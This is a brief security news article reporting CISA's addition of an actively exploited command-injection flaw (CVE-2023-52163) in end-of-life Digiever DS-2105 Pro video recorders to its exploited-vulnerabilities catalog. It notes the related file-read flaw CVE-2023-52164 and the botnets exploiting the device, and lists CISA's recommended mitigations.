CISA Flags Actively Exploited Digiever NVR Vulnerability Allowing Remote Code Execution

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw affecting Digiever DS-2105 Pro network video recorders (NVRs) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation by threat actors.

About the Vulnerability

The flaw, tracked as CVE-2023-52163 with a CVSS score of 8.8, allows post-authentication remote code execution via command injection. Specifically, attackers can exploit the vulnerability through the time_tzsetup.cgi endpoint due to missing authorization controls.

CISA warned:

“Digiever DS-2105 Pro contains a missing authorization vulnerability which could allow for command injection via time_tzsetup.cgi.”

Reports from Akamai and Fortinet indicate that the vulnerability has been actively exploited to deploy botnets, including Mirai and ShadowV2, highlighting the urgency of mitigation.

End-of-Life Devices and Additional Risks

Security researcher Ta-Lun Yen from TXOne Research noted that the DS-2105 Pro remains unpatched because the device has reached end-of-life (EoL) status. Another related flaw, CVE-2023-52164 (arbitrary file read, CVSS 5.1), also remains unresolved.

Exploitation requires attackers to be logged into the device and send specially crafted requests. Without a patch, these devices are highly susceptible to compromise, particularly when exposed to the internet.

Recommended Mitigations

CISA advises affected users and Federal Civilian Executive Branch (FCEB) agencies to take the following actions:

• Avoid exposing the NVR to the internet
• Change default usernames and passwords
• Apply mitigations provided by the vendor or discontinue use of the device by January 12, 2025

Organizations relying on DS-2105 Pro NVRs should implement these steps immediately to protect networks from active threats.